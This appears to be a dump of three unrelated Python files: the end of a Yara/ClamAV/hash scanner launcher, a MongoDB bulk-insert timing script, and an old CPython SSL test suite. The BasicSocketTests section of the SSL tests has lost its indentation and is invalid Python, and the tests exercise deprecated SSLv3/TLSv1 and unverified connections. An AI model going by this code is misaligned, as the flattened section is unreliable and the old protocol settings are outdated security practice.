            self.process_pool.append(yara_scanner_process)
            # Add Clamd AV process to process list
            self.process_pool.append(clamd_scanner_process)

            # Start Hash Scanner process
            hash_scanner_process.start()
            self.logger.log(
                "Hash Scanner engine started",
                logtype="info"
            )
            # Start Yara Scanner process
            yara_scanner_process.start()
            self.logger.log(
                "Yara Scanner engine started",
                logtype="info"
            )
            # Start Clam AV Scanner process
            clamd_scanner_process.start()
            self.logger.log(
                "Clam AV Scanner engine started",
                logtype="info"
            )

            # Complete the process
            for process in self.process_pool:
                process.join()
            return True

        except KeyboardInterrupt:
            # Best-effort shutdown of all scanner processes.
            for process in self.process_pool:
                process.terminate()
            return True

        except Exception as e:
            self.logger.log(
                "Error occurred: " + str(e),
                logtype="error"
            )
            return True
|
mongodb_04.py | import time
from pymongo import MongoClient
from datetime import datetime
from threading import Thread, Lock
# Wall-clock start time for the final duration print-out.
start = datetime.now()
# NOTE(review): credentials are hard-coded; move them to config/env vars.
client = MongoClient("mongodb://username:password@127.0.0.1")
database = client["database_name"]
collection = database["collection_name"]
# Number of in-flight insert threads; guarded by `lock`.
threads_count = 0
lock = Lock()
# Current batch of documents awaiting insertion.
package = []
def send(p):
    """Insert a batch of documents while tracking the in-flight thread count.

    Runs on a worker thread; increments/decrements the global
    `threads_count` under `lock` so the main loop can throttle.
    """
    global threads_count
    with lock:
        threads_count += 1
    collection.insert_many(p)
    # NOTE(review): if insert_many raises, the counter is never decremented
    # and the main loop's throttle/exit conditions stall forever.
    with lock:
        threads_count -= 1
# Stream the CSV, batching rows into `package` and flushing each batch of
# 10,000 documents to MongoDB on a background thread.
workers = []
with open("utils/trash.csv") as file:
    for line in file:
        # maxsplit=1 keeps descriptions that themselves contain commas intact
        # (the original split(",") raised ValueError on such lines).
        name, description = line.split(",", 1)
        package.append({"name": name, "description": description})
        if len(package) >= 10000:
            # Throttle: allow at most 4 in-flight insert threads.
            while threads_count >= 4:
                time.sleep(0)
            worker = Thread(target=send, args=(package[:],), daemon=True)
            workers.append(worker)
            worker.start()
            package.clear()
# Flush the final partial batch synchronously.
if package:
    collection.insert_many(package)
# BUGFIX: join the worker threads instead of spinning on `threads_count`.
# The old `while threads_count != 0: pass` could exit before a just-started
# thread incremented the counter (losing inserts from the final count), and
# it burned a full CPU core while waiting.
for worker in workers:
    worker.join()
print(collection.count_documents({}))
collection.drop()
# NOTE(review): this drops database "mongo" although the data was written to
# "database_name" — looks like a leftover from another script; confirm.
client.drop_database("mongo")
print(datetime.now() - start)
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
# Skip the whole test module if the interpreter was built without ssl.
ssl = support.import_module("ssl")

# Protocol constants exercised by the parameterized context tests below.
PROTOCOLS = [
    ssl.PROTOCOL_SSLv3,
    ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1
]
if hasattr(ssl, 'PROTOCOL_SSLv2'):
    PROTOCOLS.append(ssl.PROTOCOL_SSLv2)

HOST = support.HOST

# Resolve a data file living next to this test module.
data_file = lambda name: os.path.join(os.path.dirname(__file__), name)

# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")  # deliberately nonexistent path
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
def handle_error(prefix):
    """In verbose mode, write the current exception to stdout with *prefix*."""
    if support.verbose:
        exc_lines = traceback.format_exception(*sys.exc_info())
        sys.stdout.write(prefix + ' '.join(exc_lines))
def can_clear_options():
    """True when the linked OpenSSL allows clearing SSLContext options."""
    # 0.9.8m or higher
    return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
    """True when disabling SSLv2 makes OpenSSL send an SSLv3 hello."""
    # 0.9.7h or higher
    return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
    """Decorator: skip *func* on Ubuntu/Debian builds with patched OpenSSL.

    When the build has no SSLv2 support at all, the function is returned
    unmodified.
    """
    if not hasattr(ssl, 'PROTOCOL_SSLv2'):
        return func

    @functools.wraps(func)
    def f(*args, **kwargs):
        try:
            ssl.SSLContext(ssl.PROTOCOL_SSLv2)
        except ssl.SSLError:
            broken = (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15)
                      and platform.linux_distribution() == ('debian', 'squeeze/sid', ''))
            if broken:
                raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
        return func(*args, **kwargs)
    return f
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
#ssl.PROTOCOL_SSLv2
ssl.PROTOCOL_SSLv23
ssl.PROTOCOL_SSLv3
ssl.PROTOCOL_TLSv1
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
self.assertIn(ssl.HAS_SNI, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['notAfter'], 'Oct 5 23:01:56 2020 GMT')
self.assertEqual(p['notBefore'], 'Oct 8 23:01:56 2010 GMT')
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 2.0
self.assertLess(n, 0x20000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 2)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 26)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by OpenSSL, the format might change
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
ss = ssl.wrap_socket(s)
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
s = ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
ok(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
def test_server_side(self):
    """server_hostname is a client-only option: wrapping a socket on the
    server side while passing one must raise ValueError."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    with socket.socket() as listener:
        self.assertRaises(ValueError, ctx.wrap_socket, listener, True,
                          server_hostname="some.hostname")
class ContextTests(unittest.TestCase):
    # Local (non-networked) tests of the ssl.SSLContext API.

    @skip_if_broken_ubuntu_ssl
    def test_constructor(self):
        # Every supported protocol constant must be accepted; SSLv2 may be
        # compiled out of the underlying OpenSSL, so probe for it first.
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv2)
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv3)
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Missing or bogus protocol arguments are rejected.
        self.assertRaises(TypeError, ssl.SSLContext)
        self.assertRaises(ValueError, ssl.SSLContext, -1)
        self.assertRaises(ValueError, ssl.SSLContext, 42)

    @skip_if_broken_ubuntu_ssl
    def test_protocol(self):
        # The constructor argument is reflected in the .protocol attribute.
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.protocol, proto)

    def test_ciphers(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_ciphers("ALL")
        ctx.set_ciphers("DEFAULT")
        # A cipher spec that matches no cipher must raise SSLError.
        with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
            ctx.set_ciphers("^$:,;?*'dorothyx")

    @skip_if_broken_ubuntu_ssl
    def test_options(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # OP_ALL is the default value
        self.assertEqual(ssl.OP_ALL, ctx.options)
        ctx.options |= ssl.OP_NO_SSLv2
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2,
                         ctx.options)
        ctx.options |= ssl.OP_NO_SSLv3
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
                         ctx.options)
        if can_clear_options():
            # Clearing one option bit while setting another must round-trip.
            ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
            self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
                             ctx.options)
            ctx.options = 0
            self.assertEqual(0, ctx.options)
        else:
            # Older OpenSSL versions only allow setting option bits,
            # never clearing them.
            with self.assertRaises(ValueError):
                ctx.options = 0

    def test_verify(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Default value
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        ctx.verify_mode = ssl.CERT_OPTIONAL
        self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
        ctx.verify_mode = ssl.CERT_REQUIRED
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        ctx.verify_mode = ssl.CERT_NONE
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        # Only the CERT_* integer constants are acceptable values.
        with self.assertRaises(TypeError):
            ctx.verify_mode = None
        with self.assertRaises(ValueError):
            ctx.verify_mode = 42

    def test_load_cert_chain(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Combined key and cert in a single file
        ctx.load_cert_chain(CERTFILE)
        ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
        # certfile is mandatory; keyfile alone is a TypeError.
        self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
        with self.assertRaises(IOError) as cm:
            ctx.load_cert_chain(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(BADCERT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(EMPTYCERT)
        # Separate key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY)
        ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
        ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
        # Supplying only half of the pair must fail inside the PEM lib.
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYCERT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYKEY)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
        # Mismatching key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
            ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)

    def test_load_verify_locations(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(CERTFILE)
        ctx.load_verify_locations(cafile=CERTFILE, capath=None)
        ctx.load_verify_locations(BYTES_CERTFILE)
        ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
        # At least one of cafile/capath must be given and non-None.
        self.assertRaises(TypeError, ctx.load_verify_locations)
        self.assertRaises(TypeError, ctx.load_verify_locations, None, None)
        with self.assertRaises(IOError) as cm:
            ctx.load_verify_locations(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_verify_locations(BADCERT)
        ctx.load_verify_locations(CERTFILE, CAPATH)
        ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
        # Issue #10989: crash if the second argument type is invalid
        self.assertRaises(TypeError, ctx.load_verify_locations, None, True)

    @skip_if_broken_ubuntu_ssl
    def test_session_stats(self):
        # A freshly created context reports all-zero session statistics.
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.session_stats(), {
                'number': 0,
                'connect': 0,
                'connect_good': 0,
                'connect_renegotiate': 0,
                'accept': 0,
                'accept_good': 0,
                'accept_renegotiate': 0,
                'hits': 0,
                'misses': 0,
                'timeouts': 0,
                'cache_full': 0,
            })

    def test_set_default_verify_paths(self):
        # There's not much we can do to test that it acts as expected,
        # so just check it doesn't crash or raise an exception.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_default_verify_paths()
class NetworkedTests(unittest.TestCase):
    # Tests that require a live connection to a remote host (mostly
    # svn.python.org).  Each test body is wrapped in
    # support.transient_internet() so transient network failures turn
    # into skips rather than test failures.

    def test_connect(self):
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE)
            try:
                s.connect(("svn.python.org", 443))
                # Without verification no peer certificate is reported.
                self.assertEqual({}, s.getpeercert())
            finally:
                s.close()

            # this should fail because we have no verification certs
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED)
            self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
                                   s.connect, ("svn.python.org", 443))
            s.close()

            # this should succeed because we specify the root cert
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            try:
                s.connect(("svn.python.org", 443))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_connect_ex(self):
        # Issue #11326: check connect_ex() implementation
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            try:
                # connect_ex() returns 0 on success instead of raising.
                self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_non_blocking_connect_ex(self):
        # Issue #11326: non-blocking connect_ex() should allow handshake
        # to proceed after the socket gets ready.
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                s.setblocking(False)
                rc = s.connect_ex(('svn.python.org', 443))
                # EWOULDBLOCK under Windows, EINPROGRESS elsewhere
                self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
                # Wait for connect to finish
                select.select([], [s], [], 5.0)
                # Non-blocking handshake
                while True:
                    try:
                        s.do_handshake()
                        break
                    except ssl.SSLError as err:
                        # Retry whenever OpenSSL wants more I/O in
                        # either direction.
                        if err.args[0] == ssl.SSL_ERROR_WANT_READ:
                            select.select([s], [], [], 5.0)
                        elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
                            select.select([], [s], [], 5.0)
                        else:
                            raise
                # SSL established
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_timeout_connect_ex(self):
        # Issue #12065: on a timeout, connect_ex() should return the original
        # errno (mimicking the behaviour of non-SSL sockets).
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                # Timeout small enough that the connect cannot complete.
                s.settimeout(0.0000001)
                rc = s.connect_ex(('svn.python.org', 443))
                if rc == 0:
                    self.skipTest("svn.python.org responded too quickly")
                self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
            finally:
                s.close()

    def test_connect_ex_error(self):
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            try:
                # Port 444 is expected to be closed: a refused connection
                # must be reported as an errno, not an exception.
                self.assertEqual(errno.ECONNREFUSED,
                                 s.connect_ex(("svn.python.org", 444)))
            finally:
                s.close()

    def test_connect_with_context(self):
        with support.transient_internet("svn.python.org"):
            # Same as test_connect, but with a separately created context
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                self.assertEqual({}, s.getpeercert())
            finally:
                s.close()
            # Same with a server hostname
            s = ctx.wrap_socket(socket.socket(socket.AF_INET),
                                server_hostname="svn.python.org")
            if ssl.HAS_SNI:
                s.connect(("svn.python.org", 443))
                s.close()
            else:
                # Without SNI support, passing server_hostname must fail
                # when connecting.
                self.assertRaises(ValueError, s.connect, ("svn.python.org", 443))
            # This should fail because we have no verification certs
            ctx.verify_mode = ssl.CERT_REQUIRED
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
                                   s.connect, ("svn.python.org", 443))
            s.close()
            # This should succeed because we specify the root cert
            ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()

    def test_connect_capath(self):
        # Verify server certificates using the `capath` argument
        # NOTE: the subject hashing algorithm has been changed between
        # OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
        # contain both versions of each certificate (same content, different
        # filename) for this test to be portable across OpenSSL releases.
        with support.transient_internet("svn.python.org"):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=CAPATH)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()
            # Same with a bytes `capath` argument
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=BYTES_CAPATH)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()

    @unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
    def test_makefile_close(self):
        # Issue #5238: creating a file-like object with makefile() shouldn't
        # delay closing the underlying "real socket" (here tested with its
        # file descriptor, hence skipping the test under Windows).
        with support.transient_internet("svn.python.org"):
            ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
            ss.connect(("svn.python.org", 443))
            fd = ss.fileno()
            f = ss.makefile()
            f.close()
            # The fd is still open
            os.read(fd, 0)
            # Closing the SSL socket should close the fd too
            ss.close()
            gc.collect()
            with self.assertRaises(OSError) as e:
                os.read(fd, 0)
            self.assertEqual(e.exception.errno, errno.EBADF)

    def test_non_blocking_handshake(self):
        with support.transient_internet("svn.python.org"):
            s = socket.socket(socket.AF_INET)
            s.connect(("svn.python.org", 443))
            s.setblocking(False)
            s = ssl.wrap_socket(s,
                                cert_reqs=ssl.CERT_NONE,
                                do_handshake_on_connect=False)
            # Count handshake attempts until OpenSSL stops asking for I/O.
            count = 0
            while True:
                try:
                    count += 1
                    s.do_handshake()
                    break
                except ssl.SSLError as err:
                    if err.args[0] == ssl.SSL_ERROR_WANT_READ:
                        select.select([s], [], [])
                    elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
                        select.select([], [s], [])
                    else:
                        raise
            s.close()
            if support.verbose:
                sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)

    def test_get_server_certificate(self):
        with support.transient_internet("svn.python.org"):
            pem = ssl.get_server_certificate(("svn.python.org", 443))
            if not pem:
                self.fail("No server certificate on svn.python.org:443!")

            try:
                # Validating against an unrelated CA cert must fail.
                pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=CERTFILE)
            except ssl.SSLError as x:
                #should fail
                if support.verbose:
                    sys.stdout.write("%s\n" % x)
            else:
                self.fail("Got server certificate %s for svn.python.org!" % pem)

            pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            if not pem:
                self.fail("No server certificate on svn.python.org:443!")
            if support.verbose:
                sys.stdout.write("\nVerified certificate for svn.python.org:443 is\n%s\n" % pem)

    def test_ciphers(self):
        remote = ("svn.python.org", 443)
        with support.transient_internet(remote[0]):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE, ciphers="ALL")
            s.connect(remote)
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")
            s.connect(remote)
            # Error checking can happen at instantiation or when connecting
            with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
                with socket.socket(socket.AF_INET) as sock:
                    s = ssl.wrap_socket(sock,
                                        cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
                    s.connect(remote)

    def test_algorithms(self):
        # Issue #8484: all algorithms should be available when verifying a
        # certificate.
        # SHA256 was added in OpenSSL 0.9.8
        if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
            self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
        # sha256.tbs-internet.com needs SNI to use the correct certificate
        if not ssl.HAS_SNI:
            self.skipTest("SNI needed for this test")
        # https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
        remote = ("sha256.tbs-internet.com", 443)
        sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
        with support.transient_internet("sha256.tbs-internet.com"):
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(sha256_cert)
